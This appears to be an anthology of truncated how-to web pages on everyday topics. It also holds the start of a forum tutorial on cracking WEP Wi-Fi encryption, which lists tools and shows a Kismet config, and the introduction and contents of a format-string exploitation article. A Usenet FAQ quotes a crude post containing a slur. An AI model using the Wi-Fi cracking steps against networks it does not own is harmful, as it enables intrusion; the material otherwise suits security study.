How to obtain a birth or death certificate or record http://www.health.state.mn.us/divs/chs/osr/index.html

1 2 22/4/2008 4:20


Birth and deathcertificates and records ? Home

? Certified birth certificate

? Apostilles

? Non-certified copy of a birth record

? Birth records afteran adoption

? Changing a birth record

? Adding a father to a birth record (establishingpaternity)

? Birth Resulting in Still Birth

? Certified death certificate

? Non-certified copy of a death record

? Changing a death record

? Marriage certificates and divorce decrees

? Father's Adoption Registry

How to obtain a birth or death certificate or non-certified copy of a record

A birth or death certificate or record may be obtained by mail or faxfrom the Minnesota Department of Health (MDH) or in person froma local registrar office.

You may also request a birth or death certificate or non-certified copy of a record via the Internet or fax by using US Certs (an independent business) to take your information and submit your application to the Office of theState Registrar.

If you were not born in Minnesota, see the National Center for HealthStatistics Web site for more information about ordering a birth certificatefrom another state.

Click on the links below for instructions and an application to be mailed orfaxed to MDH.

Certified birth certificateNon-certified copy of a birth record (for information only--not accepted forlegal purposes)

Certified death certificateNon-certified copy of a death record (for information only--not accepted forlegal purposes)

For more information, e-mail MDH at [email protected] or call651-201-5970.

In Person

Since MDH no longer handles in-person requests, you must go to a localregistrar office to obtain a birth or death certificate or non-certified copy ofa birth or death record in person. It is no longer necessary to go to theregistrar's office of the county where the birth or death took place. Youmay go to a registrar's office in any county in Minnesota for births that tookplace during or after 1900 and for deaths that took place during or after 1997.

For deaths that took place before 1997, order by mail or fax from MDH or go to the local registrar office in the county where the death took place.

For births that took place before 1900, go to the local registrar office in thecounty where the birth took place.

If you go to a local registrar office to request the certificate, you will beasked to complete and sign an application stating that you have tangibleinterest in the certificate. You will be asked to show identification.

If you do not have identification, according to Minnesota Rules, part 4601.2600, subpart 6, you may have a witness attest to your identity.

Non-certified copies of birth and death records do not require

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alt.sex.wanted FAQThere are reader questions on this

topic!Help others by sharing your


Newsgroups: alt.sex.wantedFrom: [email protected] (Arthur Byrne)Subject: alt.sex.wanted FAQMessage-ID: <[email protected]>Summary: Frequently Asked Questions for alt.sex.wantedKeywords: No, I'm not dead. Go away, necrophiles.Date: Mon, 1 Jul 1996 05:25:04 GMTSender: [email protected]

Archive-name: alt-sex/alt-sex-wanted-faqPosting-Frequency: semi-irregularlyLast-modified: 01 June 1996

In article <[email protected]>,Clueless Newbie <[email protected]> wrote:> Hey, D00DZ! I just stumbled onto this group for... uh... Is this>for real? What's with all of the FAGZ, though? Don't they know God says>that's a sin??? And what's with all of the people posting from outside>of Ittybitty, Kansas? I only saw one post from a girl saying she was>desperate to get laid, but I didn't know how to respond. I posted an ad>saying I wuz horny six times, but I haven't heard anything yet, except>a followup telling me to read the FAQ. Where are the W0M3N? There don't>seem to be any! What do they want? I WANNA G3T LAID!! My spouse is a>dud, and I need some action; call me at 555-BOZO.>>> B1FF>>PS: What's a FAQ? And what's an ObSexWanted?

Well, actually, they didn't, but close enough has been seen.This is the <alt.sex.wanted> FAQ, which will deal with our above clueless(if hypothetical) post point by point, hopefully in an entertainingfashion.


> Hey, D00DZ! I just stumbled onto this group

A: Welcome aboard. If you don't approve of what's posted here,smile, unsubscribe, and be glad that this group keeps it out of the restof the net. If you leave, don't bother flaming, whether about the factthat there are lots of randy people trying desperately (perhapshopelessly) to hook up, about the morality of sex or any of the variantsrequested, about there being no chance; don't bother making ignorantallegations about the folks who read or post to the group, suggestingthe use of a manual alternative, et cetera.... We are all aware,unlikely to be swayed by the likes of you, and have heard it before. Andthe last guy was more eloquent. Please go over to <alt.sex> or <alt.flame>for such, as they have a staff skilled at flaming y'all out of orbit.

>for... uh...

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[ Usenet FAQs | Search | Web FAQs | Documents | RFC Index ]

Beginner Motorcycle Info - Periodic Post (v2.0)There are reader questions on this

topic!Help others by sharing your


From: [email protected] (ravi narayan)Newsgroups: rec.motorcyclesSubject: Beginner Motorcycle Info - Periodic Post (v2.0)Date: 5 Sep 1996 13:49:38 GMTMessage-ID: <[email protected]>Reply-To: [email protected]: Tips, suggestions and assorted information for new riders.

Archive-name: motorcycles/beginner-infoRec-motorcycles-archive-name: beginner-infoPosting-Frequency: monthly (5th of each month)Last-modified: 1996/09/03Version: 2.0URL: http://vger.rutgers.edu/~ravi/bike/docs/beginner.html

this document is available through the web at


this is one of the most interesting and worthwhile posts that i ever read on rec.moto and i reproduce it in entirety, since i am not capable of making half the sense! this document was prepared by Lisa Delorme and with her permission i continue to repost it every once in a while. please send all comments and criticism to: [email protected].

Thanks to: Lisa Delorme, Lissa Shoun, Andy Beals, Don "Pooder" Fearn.

a small point before we proceed:


one of the questions that is posed by almost each person new to motorcycling and rec.moto is: What bike should i buy?. there is no one answer to this question and if you have to ask us what you want to buy, maybe you haven't understood motorcycling yet! however, if this is thefirst time you are going to ride a motorcycle, a goldwing or a ninjazx-11 may not be the right bike for you. believe us, when we tell youthat there is enough time left in your life for you to get 10 dream bikes.as a beginner you have to bear in mind that you are more liable to dropyour bike, and more liable to drop it on yourself! keep the costs of thebike down, buy used, buy a rat bike, something without too much plastic.go for something light and easy to handle, with not too much power. anideal beginner's bike would be in the range of 250-600cc, and you shouldbe able to get a used bike in this range, in most parts, for about $1000-$2000.

despite the amazing performance of the latest fgxsrz as reported in themedia, it may not be the right bike for you due to various reasons suchas comfort (handlebar reach, footpeg height, inclination and width of theseat, airflow), power, weight and a few hundred other features that areindividual to you and cannot be gauged by the media reviewers. rememberthat the 0.2 second difference in the 1/4 mile has no significance on theroad. read the reviews, but select a motorcycle based on how well it suitesyour needs, and how comfortable it feels. motorcycling involves a greatlevel of interaction between the rider and the motorcycle and seeminglyminor details (at the time of purchase) lacking/present in the bike, assume

Page 97: The Instructional Capital volume I

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Baidarka Instruction Manual

Building the 6.6m and 5.28m

Dyson Baidarka

(Editor's Note: Craig nicely sent me a stack of photo's to scan in. In the interest of disc space I did not includeall of them. For some I substituted pictures I already had for Tom Clark's article. Nick)

You are about to build one of the lightest, fastest, most comfortable and most seaworthy kayaks available. This2000 year old design will be a delightful surprise on your maiden voyage.

What type of boat should I build?

My first skin boat was the 6.6 Meter 2 hatch design with rudder and sail. What a gorgeous craft..... I could notbelieve how well it paddled and sailed my first time out. Great primary stability, (so good that secondarystability has fortunately not yet been experienced). It handles wel l in rough seas and is quite speedy in calmwater. Depending on crew -- expect 3.5 -- 4.5 knots average over all.

I included 1/2" X 3" ship's teak battens in my first kayak which ran the length of inside deck. These 4 stripsdefinitely added to the appearance of the craft's interior, but after some time I found that the extra weight (15lb)was not worth the trade off in weight and foot room. I then removed these wood battens and found car toploading and unloading to be much easier.

The finished 6.6m Baidarka weighed 86lb with the wood battens and 71lb without the battens. This was with the26 oz. skin. The construction time was approximately 200 hours. I would expect the same finish time from afirst time builder with moderate mechanical ability.

The 6.6m Baidarka also paddles reasonably well solo from the rear seat. Be sure to put a cover over the fronthatch. Paddling the 6.6 by yourself is a good work out. It is not difficult to make above 3 knots.

Sailing the 6.6m Baidarka is exhilirating. The sail rig (for down wind sailing only) can be made for about $30 to$50 but I decided to have the mast made for the Baidarka on a large wooden lathe at a cost of $47.00. The sailwas made by a local sail maker for $150. I later put windows in the sail as this helps the pilot see where he isgoing. Of course a wind at your back is best as there is no center or side board to keep you from slipping sideways. Experimenting with different wind directions is a lot of fun. But be very careful as a strong side wind willcapsize you. I also attached cleats (need picture??) and reinforced them with stainless steel braces runningforward and attached to station #4. Be careful not to position anything on deck where it might interfere withyour paddling stroke or bang up your knuckles.

For the rudder system I used the designed set up and attached "Necke" steering pedals to aluminum sheet metalbrackets sewn to the stringers. Cabling was easily run through plastic tubing and affixed with plastic wire ties(see pic 1). To draw and lower the rudder I tried many different approaches and found that the rigging (see pic??) worked best. The rudder sometimes needs a tap from your paddle if you have pulled it to the full upposition. This is especially true if there is sand in the mechanism.

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How To Buy a Used Car http://www.faqs.org/docs/consumer/used-car.html

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How to Buy a Used Car

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Once you?ve narrowed your car choices, research thefrequency of repair and maintenance costs on themodels in auto-related consumer magazines. TheU.S. Department of Transportation?s Auto SafetyHotline (1-800-424-9393) gives information on recalls.

You have two choices: pay in full or finance over time.If you finance, the total cost of the car increases.That?s because you?re also paying for the cost ofcredit, which includes interest and other loan costs.You?ll also have to consider how much you can putdown, your monthly payment, the length of the loan,and the annual percentage rate (APR). Keep in mindthat annual percentage rates usually are higher andloan periods generally are shorter on used cars thanon new ones.

Dealers and lenders offer a variety of loan terms and payment schedules. Shop around, compare offers, and negotiate the best deal you can. Be cautiousabout advertisements offering financing to first-time buyers or people with bad credit. These offers oftenrequire a big down payment and a high APR. If you agree to financing that carries a high APR, you may be taking a big risk. If you decide to sell the car beforethe loan expires, the amount you receive from the sale may be far less than the amount you need to pay off the loan. If the car is repossessed or declared a totalloss because of an accident, you may be obligated to pay a considerable amount to repay the loan evenafter the proceeds from the sale of the car or the insurance payment have been deducted. If your budget is tight, you may want to consider paying cashfor a less expensive car than you first had in mind.

If you decide to finance, make sure you understand the following aspects of the loan agreement before you sign any documents:

the exact price you?re paying for the vehiclethe amount you?re financingthe finance charge (the dollar amount the credit will cost you)the APR (a measure of the cost of credit, expressed as a yearly rate)the number and amount of paymentsthe total sales price (the sum of the monthly payments plus the down payment) Used cars

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By Gurpur M. Prabhu

Read Prabhu's new book Anita's Legacy

This tutorial introduces undergraduate students to computer architectureconcepts of caches and pipelining. It contains examples, interactive applets and some problems with solutionsto illustrate basic ideas. For more information on the topics the interestedreader is referred to "Computer Architecture: A Quantitative Approach",second edition, by D.A.Patterson and J.L.Hennessy. The problems that havebeen solved have been taken from a number of sources but the solutions arenovel and unique in the sense that emphasis has been placed not only on theanswers but also on reasoning processes that will be useful in solving similarproblems.

To be able to see and interact with java applets in this tutorial, please enableJava in your browser. If you work with Netscape browser, go toEdit/Preferences/Advanced and check the box "Enable Java".

Feedback consisting of comments and errors are welcome, and can bee-mailed to Gurpur Prabhu at [email protected].


Computer Performance

Amdahl's Law

Computer Performance - I

Computer Performance - II

Memory Hierarchy Design

Page 100: The Instructional Capital volume I

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How To Help Stop Global Warming | How To Do Things.com http://www.howtodothings.com/hobbies/how-to-help-stop-global-warming

1 2 13/4/2008 10:19




By Bronwyn Harris


How To Help Stop Global WarmingDo Your Part to Fight Climate Change!

Global warming is scary and can seem extremely overwhelming! However, each of us has a part,

however small, in stopping climate change. By reducing your carbon footprint, or how much your

activities contribute to global warming, you can do your part to stop it. Remember that your activities

can contribute both directly and indirectly to global warming.

Reduce the energy you use for heating and cooling. You've heard it before -- keep your

house cooler in the winter and warmer in the summer. By reducing the energy used for heat and

air conditioning, you are not only saving energy and reducing your carbon footprint, but also

saving money!


Use a programmable thermostat. By automatically reducing the amount of heat or air

conditioning used while you are sleeping, you can reduce your carbon footprint and save money,

without any extra effort.


Recycle. It gets easier every day.3.

Drive less. The rising price of gas makes this option an attractive one! Carpool when you can,

ride your bike, walk, or take public transportation. Again, isn't it nice when you can help stop

global warming and save money?


Drive a more fuel-efficient car. If you have to drive, drive a hybrid, or at least a fuel-efficient

car, which contribute less to global warming.


Plant trees. Planting trees and other plants native to your area can help counter global warming

and deforestation.


Buy Energy Star appliances. Energy Star appliances must meet minimum energy efficiency

standards, reducing your carbon footprint!


Use compact fluorescent light bulbs. These light bulbs last longer than incandescent bulbs,

and use less energy, combating global warming.


Contact your representatives! Write to your representatives in Congress and let them know

that you want them to take action to stop global warming! Research the bills that they are voting

on and urge them to support methods that will combat climate change.


Clean filters on your air conditioner and furnace. Dirty air filters decrease energy efficiency,

while clean ones increase energy efficiency.


Hang your clothes out to dry. Try using a clothesline instead of a dryer when weather permits.

In addition to helping the fight against global warming, you will have clothes that smell fresh

from being in the sunshine!


Turn off and unplug unused appliances. "Vampire" appliances are appliances that use

electricity even while they are turned off or not being used. Make sure you turn off -- and better

yet, unplug -- your VCR, toaster, printer, and any other appliances that are not being used.


There are many more ways that you can help stop global warming! Check out these other ideas to

fight global warming and spread the word! The more of us that join in the fight against global

warming, the better the news is for our planet!


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How to Perform Self Hypnosis - wikiHow http://www.wikihow.com/Perform-Self-Hypnosis

1 3 22/4/2008 4:19


How to Perform Self Hypnosis

Self-Hypnosis is a naturally occurring state of mind which can be defined as a heightened state of focused concentration(trance), with the willingness to follow instructions (suggestibility).

StepsGo to a comfortable, private place and sit in any comfortable chair or couch. Although some people prefer to lie down, youare more susceptible to sleep than when sitting up. Whether you sit or lie, ensure you do not cross your legs or any part ofyour body. You may be in this position for a while and this could end up being uncomfortable.


Make sure you are not going to be disturbed for at least half an hour.2.

Close your eyes and try to rid your mind of any feelings of fear, stress, or anxiety. When you begin, you will find it difficultnot to think. You may find that thoughts keep intruding. When this happens, don't try to force the thoughts out. Observethem impartially, and then let them slip away.


Recognize the tension in your body. Beginning with your toes, imagine the tension slowly falling away from your body andvanishing. Imagine it freeing each body part one at a time starting with your toes and working its way up your body.Visualize each part of your body becoming lighter and lighter as the tension is removed. relax your toes, then your feet.Continue with your calves, thighs, hips, stomach and so on, until you've relaxed each portion, including your face andhead. Using imagery techniques of something you find comforting or soothing, such as water (feel the water rushing overyour feet and ankles, cleansing them of tension) can be effective as well.


Take slow, deep breaths. When you exhale, see the tension and negativity leaving in a dark cloud. As you inhale, see theair returning as a bright force filled with life and energy.


Appreciate the fact that you are now extremely relaxed. Imagine you are at the top of a flight of 10 stairs. Picture everydetail of this scene from the top to the bottom. Tell yourself that you are going to descend the stairs, counting each stepdown, starting at 10. Picture each number in your mind. Imagine that each number you count is further down and one stepcloser to the bottom. After each number, you will feel yourself drifting further and further into deep relaxation. As you takeeach step, imagine the feel of the step under your feet. Keep counting and stepping down until you reach the bottom. Onceyou reach the bottom imagine that you are happy and relaxed. Consider rolling your eyes gently back into your head. It caninduce a trance rather well.


At this point, you should begin to address the issue you're concerned about. Speak in the present tense. Yoursubconscious mind does not understand negatives in speech - avoid using statements with negative connotation such as"I don't want to be tired and irritable." Instead, say, "I am calm and relaxed." Examples of positive statements "I am strongand slender," "I am successful and positive," and, if you have pain, "My back feels wonderful." (see warning on PAIN)


Repeat your statement(s) to yourself as many times as you wish.8.

When you are satisfied, say to yourself that you will now count upwards from 0 to 10, and when you reach the number 10,you will slowly rise back to normal consciousness and remain calm and relaxed. Proceed to count upwards, again picturingthe numbers in detail.


Once you have ascended, give yourself a few moments before opening your eyes, and take your time getting up.10.

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"Often times the homeowner overlooks the importance of the design or layout when updating, remodeling or renovating their kitchen."

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When designing your kitchen and choosing the cabinetry and components there are certain aspects to consider.

Often times the homeowner overlooks the importance of the design or layout when updating, remodeling or renovating their kitchen. The usual cause is they are used toliving with the kitchen layout or design and often update the cabinetry and appliances confined within their current design or layout.

The current kitchen design is often the original layout, which was done at the time ofthe construction. In older homes this was often done with very little thought given tothe actual usability of the kitchen. Updating the kitchen with a new layout can oftenprovide a workable kitchen with greater appeal, more storage, and a pleasant cookingexperience.

Often homeowners visit their nearest building mega-store with their current kitchenlayout and measurements in hand only to have the "Kitchen Design Center" transfer this layout to their computer program and spit out an exact duplicate albeit neaterand with full cabinetry specifications. In most cases this is not the approach to use when renovating, updating, or remodeling your kitchen.

This is the time to rethink your kitchen layout. What is it missing? What features doyou like most when working within your current design? What features do youdislike? Try to imagine your kitchen space void of all cabinetry and appliances anddesign from there, which is the approach taken by most professional kitchendesigners. Try not to bog yourself down with the current appliance hook-up locationswhether they be gas, electric, or plumbing. In the grand scheme of things (and cost)these should be irrelevant. Electric, plumbing, gas lines, exhaust vents, and HVACducting can be moved at very reasonable costs and should not hinder the design ofyour kitchen. Remember that stock sizes of kitchen cabinets start at 9-inches wide and are sized in 3-inch increments (12, 15, etcetera).

Tips When Designing Your Kitchen

Start with the very basic "desired" appliance and fixture location.

Sinks - can be located just about anywhere and are often located so the user is facing a window to the outside. If an outside window does not exist the homeownermay want to install one or choose a sink location in which the user is facing a desirable open area of the kitchen or adjacent room.Prep sinks should be located similarly with counter space to each side.

Dishwashers - are usually located in the adjacent cabinet to the right or left of thesink base cabinet. This allows for initial rinsing of large food particles and aconvenient loading location afterwards.

Ranges, Stoves, & Cooktops - should have counter space to both the right and left of the appliance. The counter space will provide a convenient load/off load area whencooking and baking.

Refrigerators - should have counter space to both the right and left or counter space directly across from the appliance. The counter space will provide a convenientload/off load area when loading groceries or removing items.

Once you have the basic appliance locations into your layout/design you will want tostart choosing the cabinetry to compliment the items to be stored in proximity to theappliances.

Sinks - should have draws for dishtowels, vegetable brushes, and other items used near the sink.

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Explosion with Collision Animation Tutorial # 1

This tutorial shows you how to create an explosion with a meshed object, have the explosion fragments bounce off of a structure, and also covers a visibility track to make our "teapot" disappear after the fact. This tutorial assumes you know the basics of 3ds Max; ie, you can create boxes, apply materials, you can find your way around the Create panels, and you know how to do a boolean operation.

This is what we are going to create - a teapot that explodes into chunks, which collide with different models and bounce off of them realistically.

How To Use Bloom's Taxonomy for Reports | eHow.com http://www.ehow.com/how_2121914_use-blooms-taxonomy-reports.html

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Instructions Difficulty: Moderate

How to Use Bloom's Taxonomy for ReportsBy eHow Education Editor

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Bloom's Taxonomy, a multi-tiered model of classifying thinking, helps children develop higher-level thinking skills. When doing a report, use the Bloom'sTaxonomy thinking skills to help the child achieve good results with his learning. While they learn about knowledge, comprehension, application, analysis, synthesis and evaluation, the students also learn to think outside of the box.

Step 1:Stop by your local library to research more about Bloom's Taxonomy. Whilemany websites provide information concerning the thinking skills and history of Bloom's Taxonomy, learn the most about it as possible through literature.

Step 2:Think about how Bloom's Taxonomy can help develop higher-level thinkingskills. When using Bloom's Taxonomy for reports, it's helpful to look at other examples of people who wrote reports based on this taxonomy.

Step 3:Visit webquests online that have utilized Bloom's Taxonomy higher-levelthinking skills to create in-depth and knowledgeable information. The sample webquests allow you to better develop your report to show that you have thought outside of the box.

Step 4:Create your report by using the very principles that make up Bloom'sTaxonomy. By demonstrating that you are able to understand the concept, create new ideas around the subject material, and evaluate and analyze the information, you can show your teacher or professor that you deserve a good grade.

Step 5:Talk about the Bloom's Taxonomy of higher-order thinking with your teacher orprofessor. Explain how you used it to create your report and suggest its use as a model in class to help others write good reports.

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This site defines Bloom's Taxonomy.This site helps educators better understand Bloom's Taxonomy.

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Crack Wep [tutorial] http://www.governmentsecurity.org/archive/t15149.html

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GovernmentSecurity.org > System Security > Wifi Security

Jun 22 2005, 03:30 AM

WEP cracking [In 10mins]

by UmInAsHoE

written for Rooted Fiction

Thanks to Murtun for getting me off my lazy ass.

[This tutorial is based from the Whoppix Flash Tut of Wep cracking just in more detailhttp://whoppix.hackingdefined.com/Whoppix-wepcrack.html ]


Ok, this is a tutorial explaining how to crack most WEP encrypted Access Points out there. The tools used will be as follows:

Kismet (any working version)>= Aireplay 2.2 beta>= Aircrack 2.1

As for wireless cards, i recommend any Prism , Orinoco , or Atheros based cards (i used the D-Link 650 Rev.1a).

Getting Started:

Let's see, First thing you are going to want to do is charge your lappy to the top (aireplay and aircrack drain the battery quite a bit) Next you are going to want to load up your favourite live CD (i used Whoppix 2.7 final) or Linux OS, then stumble across a encrypted WLAN, use Kismet to do so. Make sure you have configured your kismet .conf file correctly to be able to use your card (locate your kismet.conf file and open with your favourite text editor, i used pico);


# Sources are defined as:# source=sourcetype,interface,name[,initialchannel]# Source types and required drivers are listed in the README# The initial channel is optional, if hopping is not enabled it can be used# to set the channel the interface listens on.# YOU MUST CHANGE THIS TO BE THE SOURCE YOU WANT TO USEsource=orinoco,eth1,kismet#source=wlanng,wlan0,Prism#source=kismet_drone,,kismet_drone

^^ that is an example of part of my kismet.conf, initially that was wrong for me, i had to comment out the first line and uncomment the second (my wireless device name was wlan0, you can find this out by typing 'iwconfig' in a terminal).Note: To find your cards chipset have a good google on the model number of your card or try checking here http://www.linux-wlan.org/docs/wlan_adapters.html.gz . A full list of supported chipsets canbe found on the Kismet website under Documentation.

Changed kismet.conf:


# Sources are defined as:# source=sourcetype,interface,name[,initialchannel]# Source types and required drivers are listed in the README# The initial channel is optional, if hopping is not enabled it can be used# to set the channel the interface listens on.# YOU MUST CHANGE THIS TO BE THE SOURCE YOU WANT TO USE#source=orinoco,eth1,kismetsource=wlanng,wlan0,Prism

Ads by Google WEP Cracking WEP Key Crack WEP Security Wardriving WEP 128 Bit

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Google AdWords: Step-by-Step https://adwords.google.com/select/steps.html

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Step-by-Step (Standard Edition)(View the Starter edition account set-up process.)

The Google AdWords Standard Edition account set-up process consists of the four basic steps listed below. Scroll down this page for a more detailed tour of what you'll see when creating your account.

Step 1: Target customersChoose from dozens of languages and nearly 200 countries. You can even choose to showyour ads only to users in specific cities or regions.

Step 2: Create your adWrite your ad text and choose the keywords that will trigger those ads.

Step 3: Set pricingChoose the currency you want to use, then set your daily budget and cost per click (CPC).Spend as much or as little as you like each day; no minimum budget is required.

Step 4: Sign upFinish creating an AdWords account by providing your email address and choosing apassword. When you're ready to activate your ads, log in to your new account and submityour billing information.

Step 1 of 4: Target customers

Choose the languages and locations you'd like to target.

First, tell us the languages you'd like to target. Your ads will be available to all users who have chosen the same language(s) you select. Note that the ad itself will not be translated.

Next, tell us the locations you'd like to target. You can target customers by countries, by regions, or by custom parameters you set yourself. Make your selection, click 'Continue,' and you'll be taken to a page where you can choose your specific locations.

To target a country or region, click its name in the left window. Then click 'Add' to move thecountry or region to the selection window on the right.

The language and location selections together will determine who may see your ad. Forinstance, if you target the language French and the countries France and Italy, your ad may appear to users in those two countries who have set French as their language preference.

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A. Write your ad text.

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How To Build a Mangonel | eHow.com http://www.ehow.com/how_2244356_build-a-mangonel.html

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Instructions Difficulty: Moderately Easy

How to Build a MangonelBy David Lessem

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A mangonel is a medieval siege weapon which was used to launch rocks and other projectiles at high speeds to knock down fortifications. Traditional mangonels used a twisted rope to provide power. However, this design uses a rubber band. This is not the most accurate mangonel design there is, but it is one of the easiest to make. Read on to learn how to build a mangonel.

Things You’ll Need:

Milk cartonRubber bandBottle capDuct tapeFlat stick

Step 1:Cut the milk carton so that the base is intact and the sidesslope down from about 6 inches to the base. The actual dimensions can be varied.

Step 2:Make the throwing arm. Using duct tape, mount the bottle cap onto the front ofthe stick with the open end facing forward. A tongue depressor will work well forthis project.

Step 3:Cut two small holes in the front of the milk carton.

Step 4:Wrap tape around the base of the throwing arm. Tape it to the center of thejunction between the base and the front wall of the body of the mangonel so that it is free to swing. This step is tricky and can require a couple tries to get it right. The result isn't pretty, but it works well.

Step 5:Cut the rubber band and pull it around the back of the throwing arm andthrough the holes. When it is tight, tie or tape each end to prevent them from pulling out of the holes.

Step 6:Congratulations. You now have a working do-it-yourself mangonel. It will firespit wads, match heads, pebbles or any other small munitions placed inside thecup. Simply load, pull back the arm and release.

Step 7:To adjust the firing angle, build a pad out of tape on the front wall where thethrowing arm stops to make it release more quickly. Usually, you have to tinker with this design a bit to get it to fire very far. Alternately, you can prop the whole mangonel up at an angle.

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How To Buy Diamond Engagement Rings--Part I | How To Do Things.comhttp://www.howtodothings.com/fashion-and-personal-care/a2001-how...

1 2 10/4/2008 9:12




By Fred Cuellar

How To Buy Diamond Engagement Rings--Part I

So, you are ready to buy an engagement ring. Seems like a fairly straight forward deal. Here's the

plan: Withdraw all your cash from the ATM or bring your checkbook or your brand new or heavily

abused credit card; get into a form of transportation; enter jewelry store; pick out what you like; pay

and leave. It can literally be that easy! Buying an engagement ring is a piece of cake; buying a good

one is a little trickier.

Let's define good: a GOOD diamond is one that will hold its value (what you paid) or increase in value

over time. For 2005, only one out of every 50 diamonds sold to an end user (that's you) will hold its

value or will increase in value. The other 49 (98 percent of the lot) will have an average secondary

market value of only 19.7 percent of the original price paid. That means if you don't know how to pick

a good diamond, your diamond will depreciate over 80 percent! A poorly selected $5,000 diamond will

be worth $985 the second the 30-day return policy expires! Obviously we don't want that to happen.

We want you to have your new sparkly keep you happy and increase in value for years to come.

Do your homework before you look at your first diamond and follow my simple B.E.S.T. start strategy.

Budget. Set a reasonable amount you would like to spend before you go. The two month rule is

crazy and was set up because research studies showed that Americans would spend two months

gross salary on an engagement ring. Rather than going broke or into debt, follow the one month

rule. If you do your homework, you should easily be able to get the diamond of your dreams at

half the price you would have otherwise.


Expectation. Put on your Sherlock Holmes hat and find out what shape and size diamond your

woman would like and what type of setting as well. This information can usually be obtained

through her mother or best friend. You can even go browsing through a mall with her, pop into a

jewelry store and nonchalantly say "Hey Honey, if you could have anything, what would you

pick?" If the engagement isn't a secret, just the when she'll get it is, then you can browse

together to find out what her tastes are. Also, while you're in the jewelry store get her ring size.


Savvy. When you go into the jewelry store it's important to be able to talk their lingo and know

what a fair price is. This is where the 4c's and 5th c - "cost" come in. Here's a short tutorial. The

4c's stand for carat weight, clarity, color and cut.

Carat Weight: This is the physical weight of the diamond. It can be described in fractions ¼ ct,

½ ct, 1ct, etc. or points .37, .45, .98. When I say points, it means percentage points (1ct = 100

points) or 100 percent of the whole. A .48ct means the diamond is 48 percent of 1ct. A 1.25ct

would mean it's a whole carat and 25 percent of another carat. If the quality is good, the larger

the diamond the more it costs. The average size diamond given in the United States for

engagement is .38ct.

Clarity: Here, we are describing how clean the diamond is or free from blemishes and

inclusions. Blemishes can be nicks, scratches or chips outside the diamond - Inclusions are

imperfections that are "included" within the diamond. The clarity grading scale starts with

"flawless" and runs through "imperfect". Here's the whole scale:

-VS1 - SI1 are really good grades to get if the diamond is to be worn.

-IF - VVS2 are best for investment.

-I1 - I3 are very poor quality but available for very tight budgets.



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How to exploit a format string vulnerability http://doc.bughunter.net/format-string/exploit-fs.html

1 21 10/4/2008 6:33

Exploiting Format String Vulnerabilities

Written by : scut / team teso

IntroductionComparison: Buffer Overflows and Format String VulnerabilitiesStatistics: important format string vulnerabilities in 2000

The format functions How does a format string vulnerability look like ?The format function familyUse of format functionsWhat exactly is a format string ?The stack and its role at format strings

Format string vulnerabilitiesWhat do we control nowCrash of the programViewing the process memoryOverwriting of arbitrary address with arbitrary data

Variations of ExploitationShort WriteStack PoppingDirect Parameter Access

Brute ForcingResponse Based Brute ForceBlind Brute Forcing

Special CasesGOT overwriteOther targetsReturn into LibCMultiple PrintFormat string within the HeapSpecial considerations

Toolsltrace, straceGDB, objdump


1 - Introduction

This article explains the nature of a phenomenon that has shocked the security community in thesecond half of the year 2000. Known as 'format string vulnerabilities', a whole new class ofvulnerabilities has been disclosed and caused a wave of exploitable bugs being discovered in allkinds of programs, ranging from small utilities to big server applications.

The article will try to explain the structure of the vulnerability and later use this knowledge tobuild sophisticated exploits. It will show you how to discover format string vulnerabilities in Csource code, and why this new kind of vulnerability is more dangerous than the common bufferoverflow vulnerability.

The article is based on a german speech I gave at the 17th Chaos Communication Congress [2] inBerlin, Germany. After the speech I got numerous requests to translate it and received a lot ofpositive feedback. All this motivated me to revise the document, update and correct details and todo a more useable LATEX version of it.

This article covers most of the things mentioned in other articles, plus a few more tricks andtwirks when it comes to exploitation. It is up to date yet, and feedback is welcome. So after youhave read it please send me feedback, ideas and anything else non-harassive [email protected].

The first part of the article deals with the history and awareness of format string vulnerabilities,followed by details how to discover and avoid such vulnerabilities in source code. Then some basictechniques are developed to play with this vulnerabilities, from which a mighty exploitation

How to create an art gallery online http://www.koonji.com/showKoonji.htm?koonjiId=902

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Are you an Artist? The Art of Self Promotion

Grants for Artists Create an Art Gallery Online

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Free art lessons - Learn how to draw, sketch and paintFree art lessons and tutorials for drawing people, sketching faces, wildlife ... Learn how to draw and develop art skills. Commercial Art Video Tutorials also available.

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Design Talent : Natural or Learned?I like to think that design can be taught. Can art be taught? No. But creating effective designs can be taught I believe. If not, there is just no hope for me.

Can it be learned?Like every thing in life you have to dedicate yourself if you want to be succesful or achieve a certian quality. Study, research and practice are you main elements if you want to get anywhere, it's that simple. I look at my earlier drawings and see where I lacked skill. I always tried to work out what I did wrong and try to improve those areas. As to talent vs learning I believe learning is the major key to success, there is always something new. Raw talent will only get you so far, it's only when you refine that talent is when you'll start to see the magic.

How to create an art gallery onlineCreated by: pling | Key contributors:So you're a budding artist. Got that creativity flowing through your veins and lie awake nights dreaming about ideas and concepts. You think you can be a good artist, maybe even a great one. But you don't want to give up your career, grow a beard and start living like an artist. Well, read on, and find out how to set up your own art gallery online, where thousands of people view your materpieces and comment on your amazing concepts. In this article, I tell you what tools and talent you need, how to do it and how to promote yourself as an artist and your art online.

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Are you an Artist?You can spend your entire life studying the works of great artists and be able to identify their works by a mere brushstroke,but that doesn't make you, or me, an artist. Where the art comes from is a much debated issue, but suffice it to say that thefactors involved include your genes ( meaning the kind of parents you have ), your surroundings and your mindset.

Point I'm trying to make here is that it's possible to learn how to be an artist, by means of study and observation. You couldjoin an art school. You could con a famous artist into taking you as an apperentice. But....Ultimately, you can become agood artist, but not a great one. And with there being no shortage of starving artists scraping by on grants and subsidies,do you want to add to that list?

Not to throw a bucket a cold water on your raging fire of creativity, so I'll stick to a simple question. Do you think you canand want to be a great artist? If yes, it's time to start learning. In case you're already a not-so-young artist, meaning if youhave huge beer belly and you're starting to go bald, it's probably best to skip the learning part and move right on to thenext step.


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How To Find a Tire Leak | How To Do Things.com http://www.howtodothings.com/automotive/how-to-find-a-tire-leak

1 2 13/4/2008 10:17




By Amanda Carter

Difficulty: Cost:

How To Find a Tire LeakDunking Booth

Leaking tires... Who would have thought that a tire can one day be fine, and another day be flatter

than your morning pancakes? If your tire has an obvious gigantic tear, then you most likely have

already found the problem. Tire leaks can be tricky, and slightly annoying though. They are not

always visible to the human eye, and you cannot always pinpoint them just by running your hand

around the tire. For those of you trying to figure out whether it's time for new tires, and whether or

not you can make it to the tire store without blowing that leaky tire on the drive there, I am hoping to

help you out.

Ok, let's start out with the basics:

There are a few things you can do while your tire is still on the car.

Look. Is your tire slightly flat on the pavement? It should be round all the way around. When a

tire goes flat, even just a little bit, it will start to flatten out on the part of the tire that is on the

ground. Also take a look to see if there is anything sticking out of your tire.


Listen. Get down on your hands and knees and put your ear right up to the tire. Do you hear any

